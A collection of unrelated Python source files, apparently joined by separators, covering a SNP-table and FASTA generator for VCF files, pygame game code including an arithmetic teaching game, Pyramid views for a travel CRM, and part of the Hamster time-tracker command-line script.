allele = ''.join(self.vcfs[sample][chrom][pos]) # convert list to string
else:
allele = self.refgenome[chrom].seq[pos - 1]
except KeyError:
allele = self.refgenome[chrom].seq[pos - 1]
self.fastas.setdefault(sample, {}).setdefault(chrom, {}).setdefault(pos, []).append(allele)
# Track all alleles for each position
try:
if allele not in self.counts[chrom][pos]:
self.counts.setdefault(chrom, {}).setdefault(pos, []).append(allele)
except KeyError:
self.counts.setdefault(chrom, {}).setdefault(pos, []).append(allele)
def get_informative_snps(self):
"""SNPs position that have at least one different ALT allele within all the samples"""
print ' Getting informative SNPs'
# free up resources not needed anymore
self.ac2s.clear()
self.allac2.clear()
self.finalac1.clear()
# need to get the positions in the same order for all the sample (sort chrom and pos)
for sample in self.fastas:
for chrom in sorted(self.fastas[sample]):
for pos in sorted(self.fastas[sample][chrom]):
if len(self.counts[chrom][pos]) > 1: # if more that one ALT allele, keep it
allele = ''.join(self.fastas[sample][chrom][pos]) # convert list to string
# check if allele is empty
if allele:
self.informative_pos.setdefault(sample, {}).setdefault(chrom, {})\
.setdefault(pos, []).append(''.join(allele))
else:
print "No allele infor for {}, {}:{}".format(sample, chrom, pos)
def count_snps(self):
print ' Counting SNPs'
# free up resources not needed anymore
self.counts.clear()
# All samples should have the same number of informative SNPs
# so any can be used to get the stats
randomsample = random.choice(self.informative_pos.keys())
filteredcount = 0
informativecount = 0
# Account for multiple chromosome
for chrom in self.fastas[randomsample]:
filteredcount += len(self.fastas[randomsample][chrom]) # number of positions
informativecount += len(self.informative_pos[randomsample][chrom])
# print to screen
print "\nTotal filtered SNPs: {}".format(filteredcount)
print "Total informative SNPs: {}\n".format(informativecount)
# write to file
fh = open(self.section4, "a") # append mode
fh.write("Total filtered SNPs: {}\n".format(filteredcount))
fh.write("Total informative SNPs: {}\n\n".format(informativecount))
fh.close()
def write_fasta(self):
print ' Writing sample fasta files'
# free up resources not needed anymore
self.fastas.clear()
# Create output folder for fasta files
if not os.path.exists(self.output):
os.makedirs(self.output)
if isinstance(self.informative_pos, dict):
for sample, chromosomes in sorted(self.informative_pos.iteritems()):
samplepath = os.path.join(self.output, sample + '.fas')
fh = open(samplepath, 'w')
fh.write(">{}\n".format(sample))
if isinstance(chromosomes, dict):
for chrom, positions in sorted(chromosomes.iteritems()):
if isinstance(positions, dict):
for pos, allele in sorted(positions.iteritems()):
if isinstance(allele, list):
fh.write(''.join(allele)) # convert list to text
fh.write("\n")
def write_root(self):
print ' Writing root fasta file'
rootpath = os.path.join(self.output, 'root.fas')
randomsample = random.choice(self.informative_pos.keys())
rootseq = list()
fh = open(rootpath, 'w')
if isinstance(self.informative_pos, dict):
for chrom in self.informative_pos[randomsample]:
for pos in sorted(self.informative_pos[randomsample][chrom]):
rootseq.append(self.refgenome[chrom].seq[pos - 1])
fh.write(">root\n" + "{}\n".format(''.join(rootseq)))
def write_snp_table(self):
print ' Writing SNP table'
fh = open(self.table, 'w')
randomsample = random.choice(self.informative_pos.keys())
ref_pos = list()
ref_call = list()
# reference
if isinstance(self.informative_pos, dict):
for chrom in self.informative_pos[randomsample]:
for pos in sorted(self.informative_pos[randomsample][chrom]):
ref_pos.append(''.join(chrom) + '-' + str(pos))
ref_call.append(self.refgenome[chrom].seq[pos - 1])
fh.write("reference_pos\t{}\n".format("\t".join(ref_pos)))
fh.write("reference_call\t{}\n".format("\t".join(ref_call)))
# sample
if isinstance(self.informative_pos, dict):
for sample, chromosomes in self.informative_pos.iteritems():
fh.write("{}".format(sample))
if isinstance(chromosomes, dict):
for chrom, positions in sorted(chromosomes.iteritems()):
if isinstance(positions, dict):
for pos, allele in sorted(positions.iteritems()):
if isinstance(allele, list):
allele = ''.join(allele) # convert list to text
fh.write("\t{}".format(allele))
fh.write("\n")
fh.close()
if __name__ == '__main__':
from argparse import ArgumentParser
parser = ArgumentParser(description='Generate SNP table and aligned fasta files from VCF files')
parser.add_argument('-r', '--ref', metavar='ref.fasta',
required=True,
help='reference genome used in the VCF files')
parser.add_argument('-v', '--vcf', metavar='vcfFolder',
required=True,
help='location of the VCF files')
parser.add_argument('-q', '--minQUAL', metavar='minQUAL', type=int,
required=True,
help='minimum QUAL value in VCF file')
parser.add_argument('-ac1', '--ac1', metavar='AC1Report.txt',
required=True,
help='output file where positions having both AC=1 and AC=2 are reported')
parser.add_argument('-s4', '--section4', metavar='section4.txt',
required=True,
help='output file where total filtered SNP positions and total informative SNPs are reported')
parser.add_argument('-o', '--output', metavar='fastaOutFolder',
required=True,
help='folder where the output fasta files will be output')
parser.add_argument('-t', '--table', metavar='fastaTable.tsv',
required=True,
help='the SNP table')
# Get the arguments into an object
arguments = parser.parse_args()
SnpTableMaker(arguments)
|
import sys, pygame, frametime, properties, random
from enemy import Enemy
class Enemies:
enemies = []
blackSurface = pygame.Surface([Enemy.enemy.get_width(), Enemy.enemy.get_height()])
blackSurface.fill([0,0,0])
screen = None
def set_screen(self, screen):
self.screen = screen
def create(self):
#range that the current player ship can shoot
where_spawn = random.randint(1, properties.width - Enemy.enemy.get_width())
lenemy = Enemy(where_spawn)
self.enemies.append(lenemy)
def move(self, bullet):
to_update = []
if frametime.can_create_enemy():
self.create()
to_delete = []
to_update += [x.enemyrect for x in self.enemies]
if len(self.enemies) > 0:
for i in range(len(self.enemies)):
self.enemies[i].update(bullet)
self.screen.blit(self.blackSurface, self.enemies[i].enemyrect)
self.screen.blit(Enemy.enemy, self.enemies[i].enemyrect)
#If enemy goes off the bottom of the screen
if self.enemies[i].enemyrect.top > 800:
to_delete.append(i)
for x in to_delete:
self.remove(x)
to_update += [x.enemyrect for x in self.enemies]
return to_update
def getEnemies(self):
return self.enemies
def remove(self, index):
try:
to_update = self.enemies[index].enemyrect
self.screen.blit(self.blackSurface, self.enemies[index].enemyrect)
del self.enemies[index]
return to_update
except IndexError:
print("IndexError for enemy {0} of {1}".format(index, len(self.enemies)))
def game_over(self):
for i in range(len(self.enemies)):
self.screen.blit(self.blackSurface, self.enemies[i].enemyrect)
del self.enemies[:]
|
import logging
from pyramid.view import view_config, view_defaults
from pyramid.httpexceptions import HTTPFound
from . import BaseView
from ..models import DBSession
from ..models.account_item import AccountItem
from ..lib.bl.subscriptions import subscribe_resource
from ..lib.utils.common_utils import translate as _
from ..forms.accounts_items import (
AccountItemForm,
AccountItemSearchForm
)
from ..lib.events.resources import (
ResourceCreated,
ResourceChanged,
ResourceDeleted,
)
log = logging.getLogger(__name__)
@view_defaults(
context='..resources.accounts_items.AccountsItemsResource',
)
class AccountsItemsView(BaseView):
@view_config(
request_method='GET',
renderer='travelcrm:templates/accounts_items/index.mako',
permission='view'
)
def index(self):
return {
'title': self._get_title(),
}
@view_config(
name='list',
xhr='True',
request_method='POST',
renderer='json',
permission='view'
)
def list(self):
form = AccountItemSearchForm(self.request, self.context)
form.validate()
qb = form.submit()
return qb.get_serialized()
@view_config(
name='view',
request_method='GET',
renderer='travelcrm:templates/accounts_items/form.mako',
permission='view'
)
def view(self):
if self.request.params.get('rid'):
resource_id = self.request.params.get('rid')
account_item = AccountItem.by_resource_id(resource_id)
return HTTPFound(
location=self.request.resource_url(
self.context, 'view', query={'id': account_item.id}
)
)
result = self.edit()
result.update({
'title': self._get_title(_(u'View')),
'readonly': True,
})
return result
@view_config(
name='add',
request_method='GET',
renderer='travelcrm:templates/accounts_items/form.mako',
permission='add'
)
def add(self):
return {
'title': self._get_title(_(u'Add')),
}
@view_config(
name='add',
request_method='POST',
renderer='json',
permission='add'
)
def _add(self):
form = AccountItemForm(self.request)
if form.validate():
account_item = form.submit()
DBSession.add(account_item)
DBSession.flush()
event = ResourceCreated(self.request, account_item)
event.registry()
return {
'success_message': _(u'Saved'),
'response': account_item.id
}
else:
return {
'error_message': _(u'Please, check errors'),
'errors': form.errors
}
@view_config(
name='edit',
request_method='GET',
renderer='travelcrm:templates/accounts_items/form.mako',
permission='edit'
)
def edit(self):
account_item = AccountItem.get(self.request.params.get('id'))
return {
'item': account_item,
'title': self._get_title(_(u'Edit')),
}
@view_config(
name='edit',
request_method='POST',
renderer='json',
permission='edit'
)
def _edit(self):
account_item = AccountItem.get(self.request.params.get('id'))
form = AccountItemForm(self.request)
if form.validate():
form.submit(account_item)
event = ResourceChanged(self.request, account_item)
event.registry()
return {
'success_message': _(u'Saved'),
'response': account_item.id
}
else:
return {
'error_message': _(u'Please, check errors'),
'errors': form.errors
}
@view_config(
name='copy',
request_method='GET',
renderer='travelcrm:templates/accounts_items/form.mako',
permission='add'
)
def copy(self):
account_item = AccountItem.get_copy(self.request.params.get('id'))
return {
'action': self.request.path_url,
'item': account_item,
'title': self._get_title(_(u'Copy')),
}
@view_config(
name='copy',
request_method='POST',
renderer='json',
permission='add'
)
def _copy(self):
return self._add()
@view_config(
name='delete',
request_method='GET',
renderer='travelcrm:templates/accounts_items/delete.mako',
permission='delete'
)
def delete(self):
return {
'title': self._get_title(_(u'Delete')),
'rid': self.request.params.get('rid')
}
@view_config(
name='delete',
request_method='POST',
renderer='json',
permission='delete'
)
def _delete(self):
errors = False
ids = self.request.params.getall('id')
if ids:
try:
items = DBSession.query(AccountItem).filter(
AccountItem.id.in_(ids)
)
for item in items:
DBSession.delete(item)
event = ResourceDeleted(self.request, item)
event.registry()
DBSession.flush()
except:
errors=True
DBSession.rollback()
if errors:
return {
'error_message': _(
u'Some objects could not be delete'
),
}
return {'success_message': _(u'Deleted')}
@view_config(
name='subscribe',
request_method='GET',
renderer='travelcrm:templates/accounts_items/subscribe.mako',
permission='view'
)
def subscribe(self):
return {
'id': self.request.params.get('id'),
'title': self._get_title(_(u'Subscribe')),
}
@view_config(
name='subscribe',
request_method='POST',
renderer='json',
permission='view'
)
def _subscribe(self):
ids = self.request.params.getall('id')
for id in ids:
account_item = AccountItem.get(id)
subscribe_resource(self.request, account_item.resource)
return {
'success_message': _(u'Subscribed'),
}
|
import classes.level_controller as lc
import classes.game_driver as gd
import classes.extras as ex
import classes.board
import random
import pygame
class Board(gd.BoardGame):
def __init__(self, mainloop, speaker, config, screen_w, screen_h):
self.level = lc.Level(self,mainloop,5,10)
gd.BoardGame.__init__(self,mainloop,speaker,config,screen_w,screen_h,13,11)
def create_game_objects(self, level = 1):
self.board.decolorable = False
self.board.draw_grid = False
color = (234,218,225)
self.color = color
self.grey = (200,200,200)
self.font_hl = (100,0,250)
self.task_str_color = ex.hsv_to_rgb(200,200,230)
self.activated_col = self.font_hl
white = (255,255,255)
self.bg_col = white
self.top_line = 3#self.board.scale//2
if self.mainloop.scheme is not None:
if self.mainloop.scheme.dark:
self.bg_col = (0,0,0)
self.level.games_per_lvl = 5
if self.level.lvl == 1:
rngs = [20,50,10,19]
self.level.games_per_lvl = 3
elif self.level.lvl == 2:
rngs = [50,100,20,49]
self.level.games_per_lvl = 3
elif self.level.lvl == 3:
rngs = [100,250,50,99]
self.level.games_per_lvl = 3
elif self.level.lvl == 4:
rngs = [250,500,100,249]
elif self.level.lvl == 5:
rngs = [500,1000,100,499]
elif self.level.lvl == 6:
rngs = [700,1500,250,699]
elif self.level.lvl == 7:
rngs = [1500,2500,500,1499]
elif self.level.lvl == 8:
rngs = [2500,5000,1500,2499]
elif self.level.lvl == 9:
rngs = [5000,10000,2500,4999]
elif self.level.lvl == 10:
rngs = [10000,84999,5000,9999]
data = [39,18]
self.points = self.level.lvl
#stretch width to fit the screen size
x_count = self.get_x_count(data[1],even=None)
if x_count > 39:
data[0] = x_count
self.data = data
self.vis_buttons = [1,1,1,1,1,1,1,0,0]
self.mainloop.info.hide_buttonsa(self.vis_buttons)
self.layout.update_layout(data[0],data[1])
scale = self.layout.scale
self.board.level_start(data[0],data[1],scale)
self.n1 = random.randrange(rngs[0],rngs[1])
self.n2 = random.randrange(rngs[2],rngs[3])
self.sumn1n2 = self.n1-self.n2
self.n1s = str(self.n1)
self.n2s = str(self.n2)
self.sumn1n2s = str(self.sumn1n2)
self.n1sl = len(self.n1s)
self.n2sl = len(self.n2s)
self.sumn1n2sl =len(self.sumn1n2s)
self.cursor_pos = 0
self.correct = False
self.carry1l = []
self.carry10l = []
self.resultl = []
self.nums1l = []
self.nums2l = []
self.ship_id = 0
self.digits = ["0","1","2","3","4","5","6","7","8","9"]
if self.lang.lang == 'el':
qm = ";"
else:
qm = "?"
question = self.n1s + " - " + self.n2s + " = " + qm
self.board.add_unit(1,0,data[0]-3-(max(self.n1sl,self.n2sl))*3 ,3,classes.board.Label,question,self.bg_col,"",21)
self.board.units[-1].align = 1
#borrow 1
for i in range(self.n1sl - 1):
self.board.add_unit(data[0]-6-i*3,0,1,1,classes.board.Label,"-",self.bg_col,"",0)
self.board.add_unit(data[0]-5-i*3,0,1,1,classes.board.Letter,"",self.bg_col,"",1)
self.carry1l.append(self.board.ships[-1])
self.carry1l[-1].set_outline(self.grey, 2)
self.carry1l[-1].pos_id = i
self.board.units[-1].align = 2
#add 10
for i in range(self.n1sl - 1):
self.board.add_unit(data[0]-3-i*3,1,1,1,classes.board.Label,"+",self.bg_col,"",0)
self.board.add_unit(data[0]-2-i*3,1,1,1,classes.board.Letter,"",self.bg_col,"",1)
self.carry10l.append(self.board.ships[-1])
self.carry10l[-1].set_outline(self.grey, 2)
self.carry10l[-1].pos_id = i
self.board.units[-1].align = 2
self.board.add_unit(data[0]-2-self.n1sl*3,0,2,1,classes.board.Label,"-1",self.bg_col,"",0)
self.board.add_unit(data[0]-2-self.n1sl*3,1,2,1,classes.board.Label,"+10",self.bg_col,"",0)
#first number
for i in range(self.n1sl):
self.board.add_unit(data[0]-3-i*3,2,3,3,classes.board.Label,self.n1s[-(i+1)],self.bg_col,"",21)
self.nums1l.append(self.board.units[-1])
self.nums1l[-1].font_color = self.grey
self.nums1l[-1].pos_id = i
#second number
i = 0
for i in range(self.n2sl):
self.board.add_unit(data[0]-3-i*3,5,3,3,classes.board.Label,self.n2s[-(i+1)],self.bg_col,"",21)
self.nums2l.append(self.board.units[-1])
self.nums2l[-1].pos_id = i
i += 1
self.board.add_unit(data[0]-3-i*3,5,3,3,classes.board.Label,"-",self.bg_col,"",21)
self.plus_label = self.board.units[-1]
#line
#line = "―" * (self.sumn1n2sl*2)
self.board.add_unit(data[0]-self.sumn1n2sl*3,8,self.sumn1n2sl*3,1,classes.board.Label,"",self.bg_col,"",21)
self.draw_hori_line(self.board.units[-1])
#self.board.units[-1].text_wrap = False
#result
for i in range(self.sumn1n2sl):
self.board.add_unit(data[0]-3-i*3,9,3,3,classes.board.Letter,"",self.bg_col,"",21)
self.resultl.append(self.board.ships[-1])
self.resultl[-1].set_outline(self.grey, 2)
self.resultl[-1].pos_id = i
self.resultl[0].set_outline(self.activated_col, 3)
self.home_square = self.resultl[0]
self.board.active_ship = self.home_square.unit_id
self.activable_count = len(self.board.ships)
for each in self.board.ships:
each.immobilize()
self.deactivate_colors()
self.reactivate_colors()
def draw_hori_line(self,unit):
w = unit.grid_w*self.board.scale
h = unit.grid_h*self.board.scale
center = [w//2,h//2]
canv = pygame.Surface([w, h-1])
canv.fill(self.bg_col)
pygame.draw.line(canv,self.grey,(0,self.top_line),(w,self.top_line),3)
unit.painting = canv.copy()
unit.update_me = True
def handle(self,event):
gd.BoardGame.handle(self, event) #send event handling up
if self.show_msg == False:
if event.type == pygame.KEYDOWN and event.key == pygame.K_LEFT:
self.home_sqare_switch(self.board.active_ship+1)
elif event.type == pygame.KEYDOWN and event.key == pygame.K_RIGHT:
self.home_sqare_switch(self.board.active_ship-1)
elif event.type == pygame.KEYDOWN and event.key == pygame.K_UP:
if self.home_square in self.resultl:
self.home_sqare_switch(self.board.active_ship-self.n1sl+1)
elif self.home_square in self.carry10l:
self.home_sqare_switch(self.board.active_ship-self.n1sl+1)
elif event.type == pygame.KEYDOWN and event.key == pygame.K_DOWN:
self.home_sqare_switch(self.board.active_ship+self.n1sl-1)
elif event.type == pygame.KEYDOWN and event.key != pygame.K_RETURN and not self.correct:
lhv = len(self.home_square.value)
self.changed_since_check = True
if event.key == pygame.K_BACKSPACE:
if lhv > 0:
self.home_square.value = self.home_square.value[0:lhv-1]
else:
char = event.unicode
if (len(char)>0 and lhv < 3 and char in self.digits):
if self.home_square in self.resultl:
if lhv == 1:
s = self.home_square.value + char
if s[0] == "0":
self.home_square.value = char
else:
n = int(s)
if n < 20:
self.home_square.value = str(n % 10)
else:
self.home_square.value = char
else:
self.home_square.value = char
elif self.home_square in self.carry1l:
if char == "1":
self.home_square.value = "1"
self.carry10l[self.home_square.pos_id].value = "10"
else:
self.home_square.value = ""
self.carry10l[self.home_square.pos_id].value = ""
self.carry10l[self.home_square.pos_id].update_me = True
elif self.home_square in self.carry10l:
if lhv == 0:
if char == "1":
self.home_square.value = "10"
elif lhv == 1:
if char == "0":
self.home_square.value = "10"
else:
self.home_square.value = ""
else:
if char == "1":
self.home_square.value = "10"
else:
self.home_square.value = ""
if self.home_square.value == "10":
self.carry1l[self.home_square.pos_id].value = "1"
else:
self.carry1l[self.home_square.pos_id].value = ""
self.carry1l[self.home_square.pos_id].update_me = True
self.home_square.update_me = True
self.mainloop.redraw_needed[0] = True
elif event.type == pygame.MOUSEBUTTONUP:
self.home_sqare_switch(self.board.active_ship)
def home_sqare_switch(self, activate):
if activate < 0 or activate > self.activable_count:
activate = self.activable_count - self.sumn1n2sl
if activate >= 0 and activate < self.activable_count:
self.board.active_ship = activate
self.home_square.update_me = True
if self.board.active_ship >= 0:
self.home_square.set_outline(self.grey, 2)
self.deactivate_colors()
self.home_square = self.board.ships[self.board.active_ship]
self.home_square.set_outline(self.activated_col, 3)
self.reactivate_colors()
self.home_square.font_color = self.font_hl
self.home_square.update_me = True
self.mainloop.redraw_needed[0] = True
def deactivate_colors(self):
for each in self.board.ships:
each.font_color = self.grey
each.update_me = True
for each in self.board.units:
each.font_color = self.grey
each.update_me = True
def reactivate_colors(self):
self.plus_label.font_color = self.font_hl
self.board.units[0].font_color = self.task_str_color
if self.home_square in self.carry1l:
self.carry10l[self.home_square.pos_id].font_color = self.font_hl
elif self.home_square in self.carry10l:
self.carry1l[self.home_square.pos_id].font_color = self.font_hl
elif self.home_square in self.resultl:
if self.home_square.pos_id > 0:
self.carry1l[self.home_square.pos_id-1].font_color = self.font_hl
if self.home_square.pos_id >= 0 and self.home_square.pos_id < self.n1sl-1:
self.carry10l[self.home_square.pos_id].font_color = self.font_hl
if (self.n1sl > self.home_square.pos_id):
self.nums1l[self.home_square.pos_id].font_color = self.font_hl
if (self.n2sl > self.home_square.pos_id):
self.nums2l[self.home_square.pos_id].font_color = self.font_hl
self.resultl[self.home_square.pos_id].font_color = self.font_hl
def update(self,game):
game.fill(self.color)
gd.BoardGame.update(self, game) #rest of painting done by parent
def check_result(self):
s = ""
for each in reversed(self.resultl):
s += each.value
if s == self.sumn1n2s:
self.update_score(self.points)
self.level.next_board()
else:
if self.points > 0:
self.points -= 1
self.level.try_again()
|
'''A script to control the applet from the command line.'''
import sys, os
import argparse
import re
import gi
gi.require_version('Gdk', '3.0') # noqa: E402
gi.require_version('Gtk', '3.0') # noqa: E402
from gi.repository import GLib as glib
from gi.repository import Gdk as gdk
from gi.repository import Gtk as gtk
from gi.repository import Gio as gio
from gi.repository import GLib as glib
import hamster
from hamster import client, reports
from hamster import logger as hamster_logger
from hamster.about import About
from hamster.edit_activity import CustomFactController
from hamster.overview import Overview
from hamster.preferences import PreferencesEditor
from hamster.lib import default_logger, stuff
from hamster.lib import datetime as dt
from hamster.lib.fact import Fact
logger = default_logger(__file__)
def word_wrap(line, max_len):
"""primitive word wrapper"""
lines = []
cur_line, cur_len = "", 0
for word in line.split():
if len("%s %s" % (cur_line, word)) < max_len:
cur_line = ("%s %s" % (cur_line, word)).strip()
else:
if cur_line:
lines.append(cur_line)
cur_line = word
if cur_line:
lines.append(cur_line)
return lines
def fact_dict(fact_data, with_date):
fact = {}
if with_date:
fmt = '%Y-%m-%d %H:%M'
else:
fmt = '%H:%M'
fact['start'] = fact_data.start_time.strftime(fmt)
if fact_data.end_time:
fact['end'] = fact_data.end_time.strftime(fmt)
else:
end_date = dt.datetime.now()
fact['end'] = ''
fact['duration'] = fact_data.delta.format()
fact['activity'] = fact_data.activity
fact['category'] = fact_data.category
if fact_data.tags:
fact['tags'] = ' '.join('#%s' % tag for tag in fact_data.tags)
else:
fact['tags'] = ''
fact['description'] = fact_data.description
return fact
class Hamster(gtk.Application):
"""Hamster gui.
Actions should eventually be accessible via Gio.DBusActionGroup
with the 'org.gnome.Hamster.GUI' id.
but that is still experimental, the actions API is subject to change.
Discussion with "external" developers welcome !
The separate dbus org.gnome.Hamster.WindowServer
is still the stable recommended way to show windows for now.
"""
def __init__(self):
# inactivity_timeout: How long (ms) the service should stay alive
# after all windows have been closed.
gtk.Application.__init__(self,
application_id="org.gnome.Hamster.GUI",
#inactivity_timeout=10000,
register_session=True)
self.about_controller = None # 'about' window controller
self.fact_controller = None # fact window controller
self.overview_controller = None # overview window controller
self.preferences_controller = None # settings window controller
self.connect("startup", self.on_startup)
self.connect("activate", self.on_activate)
# we need them before the startup phase
# so register/activate_action work before the app is ran.
# cf. https://gitlab.gnome.org/GNOME/glib/blob/master/gio/tests/gapplication-example-actions.c
self.add_actions()
def add_actions(self):
# most actions have no parameters
# for type "i", use Variant.new_int32() and .get_int32() to pack/unpack
for name in ("about", "add", "clone", "edit", "overview", "preferences"):
data_type = glib.VariantType("i") if name in ("edit", "clone") else None
action = gio.SimpleAction.new(name, data_type)
action.connect("activate", self.on_activate_window)
self.add_action(action)
action = gio.SimpleAction.new("quit", None)
action.connect("activate", self.on_activate_quit)
self.add_action(action)
def on_activate(self, data=None):
logger.debug("activate")
if not self.get_windows():
self.activate_action("overview")
def on_activate_window(self, action=None, data=None):
self._open_window(action.get_name(), data)
def on_activate_quit(self, data=None):
self.on_activate_quit()
def on_startup(self, data=None):
logger.debug("startup")
# Must be the same as application_id. Won't be required with gtk4.
glib.set_prgname(self.get_application_id())
# localized name, but let's keep it simple.
glib.set_application_name("Hamster")
def _open_window(self, name, data=None):
logger.debug("opening '{}'".format(name))
if name == "about":
if not self.about_controller:
# silence warning "GtkDialog mapped without a transient parent"
# https://stackoverflow.com/a/38408127/3565696
_dummy = gtk.Window()
self.about_controller = About(parent=_dummy)
logger.debug("new About")
controller = self.about_controller
elif name in ("add", "clone", "edit"):
if self.fact_controller:
# Something is already going on, with other arguments, present it.
# Or should we just discard the forgotten one ?
logger.warning("Fact controller already active. Please close first.")
else:
fact_id = data.get_int32() if data else None
self.fact_controller = CustomFactController(name, fact_id=fact_id)
logger.debug("new CustomFactController")
controller = self.fact_controller
elif name == "overview":
if not self.overview_controller:
self.overview_controller = Overview()
logger.debug("new Overview")
controller = self.overview_controller
elif name == "preferences":
if not self.preferences_controller:
self.preferences_controller = PreferencesEditor()
logger.debug("new PreferencesEditor")
controller = self.preferences_controller
window = controller.window
if window not in self.get_windows():
self.add_window(window)
logger.debug("window added")
# Essential for positioning on wayland.
# This should also select the correct window type if unset yet.
# https://specifications.freedesktop.org/wm-spec/wm-spec-1.3.html
if name != "overview" and self.overview_controller:
window.set_transient_for(self.overview_controller.window)
# so the dialog appears on top of the transient-for:
window.set_type_hint(gdk.WindowTypeHint.DIALOG)
else:
# toplevel
window.set_transient_for(None)
controller.present()
logger.debug("window presented")
def present_fact_controller(self, action, fact_id=0):
"""Present the fact controller window to add, clone or edit a fact.
Args:
action (str): "add", "clone" or "edit"
"""
assert action in ("add", "clone", "edit")
if action in ("clone", "edit"):
action_data = glib.Variant.new_int32(int(fact_id))
else:
action_data = None
# always open dialogs through actions,
# both for consistency, and to reduce the paths to test.
app.activate_action(action, action_data)
class HamsterCli(object):
"""Command line interface."""
def __init__(self):
self.storage = client.Storage()
def assist(self, *args):
assist_command = args[0] if args else ""
if assist_command == "start":
hamster_client._activities(sys.argv[-1])
elif assist_command == "export":
formats = "html tsv xml ical".split()
chosen = sys.argv[-1]
formats = [f for f in formats if not chosen or f.startswith(chosen)]
print("\n".join(formats))
def toggle(self):
self.storage.toggle()
def start(self, *args):
'''Start a new activity.'''
if not args:
print("Error: please specify activity")
return 0
fact = Fact.parse(" ".join(args), range_pos="tail")
if fact.start_time is None:
fact.start_time = dt.datetime.now()
self.storage.check_fact(fact, default_day=dt.hday.today())
id_ = self.storage.add_fact(fact)
return id_
def stop(self, *args):
'''Stop tracking the current activity.'''
self.storage.stop_tracking()
def export(self, *args):
args = args or []
export_format, start_time, end_time = "html", None, None
if args:
export_format = args[0]
(start_time, end_time), __ = dt.Range.parse(" ".join(args[1:]))
start_time = start_time or dt.datetime.combine(dt.date.today(), dt.time())
end_time = end_time or start_time.replace(hour=23, minute=59, second=59)
facts = self.storage.get_facts(start_time, end_time)
writer = reports.simple(facts, start_time.date(), end_time.date(), export_format)
def _activities(self, search=""):
'''Print the names of all the activities.'''
if "@" in search:
activity, category = search.split("@")
for cat in self.storage.get_categories():
if not category or cat['name'].lower().startswith(category.lower()):
print("{}@{}".format(activity, cat['name']))
else:
for activity in self.storage.get_activities(search):
print(activity['name'])
if activity['category']:
print("{}@{}".format(activity['name'], activity['category']))
def activities(self, *args):
'''Print the names of all the activities.'''
search = args[0] if args else ""
for activity in self.storage.get_activities(search):
print("{}@{}".format(activity['name'], activity['category']))
def categories(self, *args):
'''Print the names of all the categories.'''
for category in self.storage.get_categories():
print(category['name'])
def list(self, *times):
"""list facts within a date range"""
(start_time, end_time), __ = dt.Range.parse(" ".join(times or []))
start_time = start_time or dt.datetime.combine(dt.date.today(), dt.time())
end_time = end_time or start_time.replace(hour=23, minute=59, second=59)
self._list(start_time, end_time)
def current(self, *args):
"""prints current activity. kinda minimal right now"""
facts = self.storage.get_todays_facts()
if facts and not facts[-1].end_time:
print("{} {}".format(str(facts[-1]).strip(),
facts[-1].delta.format(fmt="HH:MM")))
else:
print((_("No activity")))
def search(self, *args):
"""search for activities by name and optionally within a date range"""
args = args or []
search = ""
if args:
search = args[0]
(start_time, end_time), __ = dt.Range.parse(" ".join(args[1:]))
start_time = start_time or dt.datetime.combine(dt.date.today(), dt.time())
end_time = end_time or start_time.replace(hour=23, minute=59, second=59)
self._list(start_time, end_time, search)
def _list(self, start_time, end_time, search=""):
"""Print a listing of activities"""
facts = self.storage.get_facts(start_time, end_time, search)
headers = {'activity': _("Activity"),
'category': _("Category"),
'tags': _("Tags"),
'description': _("Description"),
'start': _("Start"),
'end': _("End"),
'duration': _("Duration")}
# print date if it is not the same day
print_with_date = start_time.date() != end_time.date()
cols = 'start', 'end', 'duration', 'activity', 'category'
widths = dict([(col, len(headers[col])) for col in cols])
for fact in facts:
fact = fact_dict(fact, print_with_date)
for col in cols:
widths[col] = max(widths[col], len(fact[col]))
cols = ["{{{col}: <{len}}}".format(col=col, len=widths[col]) for col in cols]
fact_line = " | ".join(cols)
row_width = sum(val + 3 for val in list(widths.values()))
print()
print(fact_line.format(**headers))
print("-" * min(row_width, 80))
by_cat = {}
for fact in facts:
cat = fact.category or _("Unsorted")
by_cat.setdefault(cat, dt.timedelta(0))
by_cat[cat] += fact.delta
pretty_fact = fact_dict(fact, print_with_date)
print(fact_line.format(**pretty_fact))
if pretty_fact['description']:
for line in word_wrap(pretty_fact['description'], 76):
print(" {}".format(line))
if pretty_fact['tags']:
for line in word_wrap(pretty_fact['tags'], 76):
print(" {}".format(line))
print("-" * min(row_width, 80))
cats = []
total_duration = dt.timedelta()
for cat, duration in sorted(by_cat.items(), key=lambda x: x[1], reverse=True):
cats.append("{}: {}".format(cat, duration.format()))
total_duration += duration
for line in word_wrap(", ".join(cats), 80):
print(line)
print("Total: ", total_duration.format())
print()
def version(self):
print(hamster.__version__)
if __name__ == '__main__':
from hamster.lib import i18n
i18n.setup_i18n()
usage = _(
"""
Actions:
* add [activity [start-time [end-time]]]: Add an activity
* stop: Stop tracking current activity.
* list [start-date [end-date]]: List activities
* search [terms] [start-date [end-date]]: List activities matching a search
term
* export [html|tsv|ical|xml] [start-date [end-date]]: Export activities with
the specified format
* current: Print current activity
* activities: List all the activities names, one per line.
* categories: List all the categories names, one per line.
* overview / preferences / add / about: launch specific window
* version: Show the Hamster version
Time formats:
* 'YYYY-MM-DD hh:mm': If start-date is missing, it will default to today.
If end-date is missing, it will default to start-date.
* '-minutes': Relative time in minutes from the current date and time.
Note:
* For list/search/export a "hamster day" starts at the time set in the
preferences (default 05:00) and ends one minute earlier the next day.
Activities are reported for each "hamster day" in the interval.
Example usage:
hamster start bananas -20
start activity 'bananas' with start time 20 minutes ago
hamster search pancakes 2012-08-01 2012-08-30
look for an activity matching terms 'pancakes` between 1st and 30st
August 2012. Will check against activity, category, description and tags
""")
hamster_client = HamsterCli()
app = Hamster()
logger.debug("app instanciated")
import signal
signal.signal(signal.SIGINT, signal.SIG_DFL) # gtk3 screws up ctrl+c
parser = argparse.ArgumentParser(
description="Time tracking utility",
epilog=usage,
formatter_class=argparse.RawDescriptionHelpFormatter)
# cf. https://stackoverflow.com/a/28611921/3565696
parser.add_argument("--log", dest="log_level",
choices=('DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'),
default='WARNING',
help="Set the logging level (default: %(default)s)")
parser.add_argument("action", nargs="?", default="overview")
parser.add_argument('action_args', nargs=argparse.REMAINDER, default=[])
args, unknown_args = parser.parse_known_args()
# logger for current script
logger.setLevel(args.log_level)
# hamster_logger for the rest
hamster_logger.setLevel(args.log_level)
if not hamster.installed:
logger.info("Running in devel mode")
if args.action in ("start", "track"):
action = "add" # alias
elif args.action == "prefs":
# for backward compatibility
action = "preferences"
else:
action = args.action
if action in ("about", "add", "edit", "overview", "preferences"):
if action == "add" and args.action_args:
assert not unknown_args, "unknown options: {}".format(unknown_args)
# directly add fact from arguments
id_ = hamster_client.start(*args.action_args)
